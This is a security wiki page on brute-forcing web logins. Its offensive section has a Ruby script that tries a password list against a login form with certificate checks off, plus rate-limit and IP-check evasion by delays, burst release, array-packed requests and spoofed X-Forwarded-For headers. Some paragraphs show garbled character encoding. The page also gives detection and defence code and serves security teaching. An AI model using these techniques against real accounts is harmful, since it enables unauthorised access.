Brute Force

🔍 Introduction

A Brute Force attack is an attack technique that generates repeated web requests based on a given wordlist or character pattern in order to produce a security problem. The concept is similar to Fuzzing, but whereas Fuzzing sends malformed data to provoke a defect in the service, Brute force sends a large number of values in order to find one that is accepted, as in an attack on a password.

In cryptography it means trying every possible value in order to break a particular cipher.

🗡 Offensive techniques

Testing method

Brute force is usually tested with a brute-force tool or a fuzzer, or with a script written for the purpose.

Wordlists

The most widely used wordlist repository is SecLists.

Fuzzer

Scripting

์•„๋ž˜๋Š” form์„ ๋Œ€์ƒ์œผ๋กœํ•œ Ruby script์ž…๋‹ˆ๋‹ค.

require 'rubygems'
require 'mechanize'

# Usage: ruby script.rb <target-url> <username>
target = ARGV[0]
user   = ARGV[1]
passwordlist = File.open("passwords.txt")

agent = Mechanize.new do |a|
  # Disables TLS certificate verification (only for test environments).
  a.verify_mode = OpenSSL::SSL::VERIFY_NONE
end

passwordlist.each do |line|
  password = line.chomp            # strip the trailing newline once, for both the form and the output
  page   = agent.get target
  form   = page.form_with :id => 'login-form'
  form.username = user
  form.passwd   = password
  result = form.submit
  if result.body =~ /"success" : true/
    puts "SUCCESS #{user}/#{password}"
  end
end
passwordlist.close

Bypass protection

Password Spraying

If a login page applies its brute-force countermeasures per account, the approach can be inverted: fix the password and brute-force over a list of users instead. This works well against services where the administrator creates new accounts with a fixed default password, and it lets many requests be sent while the ID-based protection policy is never triggered.

  • ID: admin, qateam, infrateam, … and so on
  • PW: default_password
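The detection-side view of spraying, as an added example that is not part of the original page: the signature is one source failing against many distinct accounts with few attempts each, the opposite shape from classic per-account brute force. The log format, addresses and thresholds are constructed for the example.

```go
package main

import (
	"strings"
	"time"
)

// Constructed sample auth log (not real data): "<RFC3339 time> <source ip> <user> <OK|FAIL>".
// 203.0.113.7 tries one password against many accounts; 198.51.100.2 hammers one account.
const sampleLog = `2024-01-01T10:00:00Z 203.0.113.7 admin FAIL
2024-01-01T10:00:05Z 203.0.113.7 qateam FAIL
2024-01-01T10:00:09Z 203.0.113.7 infrateam FAIL
2024-01-01T10:00:20Z 203.0.113.7 alice OK
2024-01-01T10:00:30Z 198.51.100.2 bob FAIL
2024-01-01T10:00:31Z 198.51.100.2 bob FAIL
2024-01-01T10:00:32Z 198.51.100.2 bob FAIL`

// SprayingSources parses time-ordered log lines in the format above and returns the
// source IPs whose failed logins touched at least minUsers distinct accounts within
// window of that source's first failure. Many accounts, few attempts each, one origin
// is the spraying signature; one account hammered from one IP is not reported here.
func SprayingSources(rawLog string, window time.Duration, minUsers int) []string {
	first := map[string]time.Time{}
	users := map[string]map[string]bool{} // source ip -> accounts with a failure
	for _, line := range strings.Split(rawLog, "\n") {
		f := strings.Fields(line)
		if len(f) != 4 || f[3] != "FAIL" {
			continue // malformed line or successful login
		}
		ts, err := time.Parse(time.RFC3339, f[0])
		if err != nil {
			continue
		}
		ip, user := f[1], f[2]
		if _, seen := first[ip]; !seen {
			first[ip], users[ip] = ts, map[string]bool{}
		}
		if ts.Sub(first[ip]) <= window {
			users[ip][user] = true
		}
	}
	var flagged []string
	for ip, accounts := range users {
		if len(accounts) >= minUsers {
			flagged = append(flagged, ip)
		}
	}
	return flagged
}
```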

Bypass rate limit (slow scan)

Rate limiting, the usual countermeasure against Brute Force, is a control that specifies how many times, or how often, a function may be invoked. In that case the time/request interval can be inferred through testing, and a suitable delay added so the Brute Force proceeds without tripping the limit.

// Assumes passwords []string, user string and a SendReq(user, password) helper; needs "time".
for _, password := range passwords {
    resp := SendReq(user, password) // one attempt per password
    _ = resp                        // inspect resp for the success marker
    time.Sleep(1 * time.Second)     // wait out the inferred rate-limit interval
}

Bypass rate limit (many req)

When a service is made up of several hops and the Rate limit sits at one particular hop, another bypass exists: generate an enormous number of Requests in a very short time and send them simultaneously, pushing as many Reqs as possible past the limiting segment before the Rate limit takes effect. This is hard to do with an ordinary Fuzzer; it is better tested with code or an environment built for concurrency, or with Burp Suite's Turbo Intruder.

To introduce one simple method, first arrange the Req flow as follows.

Client -> GW -> Target server

Then configure the GW to capture requests and hold them instead of forwarding, and once a certain number has accumulated, release them all at once. This saves the time the Client would otherwise spend generating and delivering each Request.

  1. Generate Req * 100000 and send them sequentially
  2. The GW holds every request
  3. On a given condition or the attacker's trigger, the GW releases them all at the same time
  4. The target server receives a large number of Requests at the same moment

Bypass rate limit (big query)

Sometimes a service can process Array-type Arguments. In that case one large Request containing multiple sets of Login data can be sent, so that a single Request performs many tests.

POST /login HTTP/1.1
Host: <target host>
Content-Type: application/x-www-form-urlencoded

id[0]=user&password[0]=1&id[1]=user&password[1]=2&id[2]=user&password[2]=3

Bypass IP Check

๋กœ๊ทธ์ธ ํŽ˜์ด์ง€ ๋“ฑ์—์„  ์‚ฌ์šฉ์ž์˜ ์„ธ์…˜์„ ์‹๋ณ„ํ•  ์ˆ˜ ์—†๊ธฐ ๋•Œ๋ฌธ์— ๋ณดํ†ต IP ๊ธฐ๋ฐ˜์œผ๋กœ ์ œํ•œํ•˜๊ฒŒ ๋ฉ๋‹ˆ๋‹ค. ์ด๋Ÿฌํ•œ ๊ฒฝ์šฐ ์ง์ ‘ IP๋ฅผ Rotate ์‹œํ‚ค๊ฑฐ๋‚˜ X-Forwarded-For ๋“ฑ IP๋ฅผ ์†์ผ ์ˆ˜ ์žˆ๋Š” ํ—ค๋”๋ฅผ ์ด์šฉํ•˜์—ฌ ์šฐํšŒ๋ฅผ ์‹œ๋„ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

์•„๋ž˜๋Š” ZAP Fuzzer์—์„œ Random IP ๊ธฐ๋ฐ˜์œผ๋กœ X-Forwarded-For๋ฅผ ์ƒ์„ฑํ•˜๋Š” ์Šคํฌ๋ฆฝํŠธ์ž…๋‹ˆ๋‹ค. ์ž์„ธํ•œ ๋‚ด์šฉ์€ Random IP in X-Forwarded-For in ZAP ๊ธ€์„ ์ฐธ๊ณ ํ•ด์ฃผ์„ธ์š”!

function processMessage(utils, message) {
  // Generate a random value in dotted IPv4 format.
  var random_ip = Math.floor(Math.random() * 254) + "." + Math.floor(Math.random() * 254) + "." + Math.floor(Math.random() * 254) + "." + Math.floor(Math.random() * 254);
  // Set it in the X-Forwarded-For header before the fuzzing Request is sent.
  message.getRequestHeader().setHeader("X-Forwarded-For", random_ip);
}

function processResult(utils, fuzzResult) {
  return true;
}

function getRequiredParamsNames() {
  return [];
}

function getOptionalParamsNames() {
  return [];
}
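The server-side counterpart, added here and not part of the original page or the ZAP script above: a random X-Forwarded-For only defeats a limiter that trusts the header unconditionally. The function below consults the header only when the TCP peer is one of our own proxies and walks it from the right, so a value written by the client is never the address that gets rate-limited. The trusted ranges and addresses are assumed for the example.

```go
package main

import (
	"net"
	"net/netip"
	"strings"
)

// ClientIP returns the address to rate-limit on. remoteAddr is the TCP peer
// ("host:port"), xff the raw X-Forwarded-For value, trusted the CIDRs of our own
// proxies. The header is only consulted when the peer is a trusted proxy, and it is
// walked right to left, skipping our own proxies, so the first address that is not
// ours is the real client: anything a client wrote into the header itself sits
// further left and is never reached.
func ClientIP(remoteAddr, xff string, trusted []netip.Prefix) string {
	host, _, err := net.SplitHostPort(remoteAddr)
	if err != nil {
		host = remoteAddr // no port present
	}
	peer, err := netip.ParseAddr(host)
	if err != nil {
		return host
	}
	if !isTrusted(peer, trusted) {
		return peer.String() // direct client: the header is untrusted, ignore it
	}
	hops := strings.Split(xff, ",")
	for i := len(hops) - 1; i >= 0; i-- {
		addr, err := netip.ParseAddr(strings.TrimSpace(hops[i]))
		if err != nil {
			break // garbage hop: stop and fall back to the proxy address
		}
		if !isTrusted(addr, trusted) {
			return addr.String()
		}
	}
	return peer.String() // every hop was one of ours (or the header was empty)
}

func isTrusted(a netip.Addr, trusted []netip.Prefix) bool {
	for _, p := range trusted {
		if p.Contains(a) {
			return true
		}
	}
	return false
}
```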

🛡 Defensive techniques

Rate limit

As a countermeasure against Brute Force, applying a limit per time window or per number of Reqs raises the bar for repeated requests. However, an attacker who works out the conditions can devise a way around them, so it is best to apply several security controls at once to raise the bar further.

  • Block the IP after x or more failures (released after a set waiting time or by contacting an administrator)
  • Block the IP after x or more requests within x seconds
  • Block the IP after x or more requests
  • Enforce a delay of x seconds after each request
  • Any other applicable restriction
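An added example, not from the original page, combining two of the controls above in one guard. It also addresses the gateway-burst case from the "many req" section: because check-and-count happens under a lock, requests released simultaneously are still counted one at a time. The thresholds are illustrative.

```go
package main

import (
	"sync"
	"time"
)

// LoginGuard layers two controls from the list above, a per-IP sliding window and a per-account lockout,
// and does check-and-count under one lock: a burst delivered all at once is admitted one request at a time.
type LoginGuard struct {
	mu          sync.Mutex
	MaxPerIP    int // requests allowed per IP inside Window
	Window      time.Duration
	MaxFailures int // failed logins per account before Lockout applies
	Lockout     time.Duration
	ipHits      map[string][]time.Time
	failures    map[string]int
	lockedUntil map[string]time.Time
}
func NewLoginGuard(maxPerIP int, window time.Duration, maxFailures int, lockout time.Duration) *LoginGuard {
	return &LoginGuard{MaxPerIP: maxPerIP, Window: window, MaxFailures: maxFailures, Lockout: lockout,
		ipHits: map[string][]time.Time{}, failures: map[string]int{}, lockedUntil: map[string]time.Time{}}
}
// Allow reports whether an attempt from ip against user may proceed at now (passed in for testability) and records it if admitted.
func (g *LoginGuard) Allow(ip, user string, now time.Time) bool {
	g.mu.Lock()
	defer g.mu.Unlock()
	if now.Before(g.lockedUntil[user]) {
		return false // account locked: wait out Lockout or have an admin reset it
	}
	var recent []time.Time // hits from this IP still inside the window
	for _, t := range g.ipHits[ip] {
		if now.Sub(t) < g.Window {
			recent = append(recent, t)
		}
	}
	if len(recent) >= g.MaxPerIP {
		return false // this IP has used up its window
	}
	g.ipHits[ip] = append(recent, now)
	return true
}
// RecordFailure counts a failed login and locks the account once MaxFailures is reached.
func (g *LoginGuard) RecordFailure(user string, now time.Time) {
	g.mu.Lock()
	defer g.mu.Unlock()
	if g.failures[user]++; g.failures[user] >= g.MaxFailures {
		g.lockedUntil[user], g.failures[user] = now.Add(g.Lockout), 0
	}
}
```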

Captcha

Captcha is also one of the good mitigations against Brute Force. By requiring a captcha once an IP or Session exceeds a certain number of requests, or unconditionally for important functions, automated tools can be prevented from issuing repeated requests.

🕹 Tools

📌 References

Licensed under CC BY-NC-SA 4.0